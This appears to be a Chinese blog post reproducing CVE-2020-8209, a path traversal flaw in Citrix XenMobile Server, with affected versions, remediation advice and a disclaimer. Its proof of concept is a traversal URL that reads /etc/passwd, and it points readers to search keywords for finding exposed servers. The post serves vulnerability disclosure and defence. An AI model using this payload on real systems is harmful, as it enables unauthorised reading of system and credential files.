1 Xenmobile介绍
XenMobile提供了一种可靠的移动设备管理解决方案,可以对企业设备和员工个人设备进行基于角色的管理、配置和支持并确保安全性。与只能提供基本设备管理软件的大多数厂商不同,XenMobile可提供多种高级功能和特性来确保移动应用可随时用于业务目的并确保移动内容安全性,如区域防护(geo-fencing)、自动化合规性及一键式实时聊天和支持等。
2 漏洞介绍与影响范围
CVE-2020-8209利用此漏洞,可以读取Web服务器根目录之外的任意文件
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.1010.9
RP5之前的XenMobile服务器
3 漏洞复现
POC: 域名/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
(部分情况无法web直接访问 会进行下载)
关注公众号回复 XenMobile 获取fofa关键字
4 修复方案
1 及时更新补丁升级为最新版
2 部署waf 禁止访问jsp/help-sb-download.jsp***
5 参考
本文参考于ChaBug don9sec 福林表哥
欢迎各位大佬加好友进行交流
对师傅们有用的话 点一下在看 转发一下文章就好 谢谢
本文始发于微信公众号(阿乐你好):CVE-2020-8209 XenMobile文件读取漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论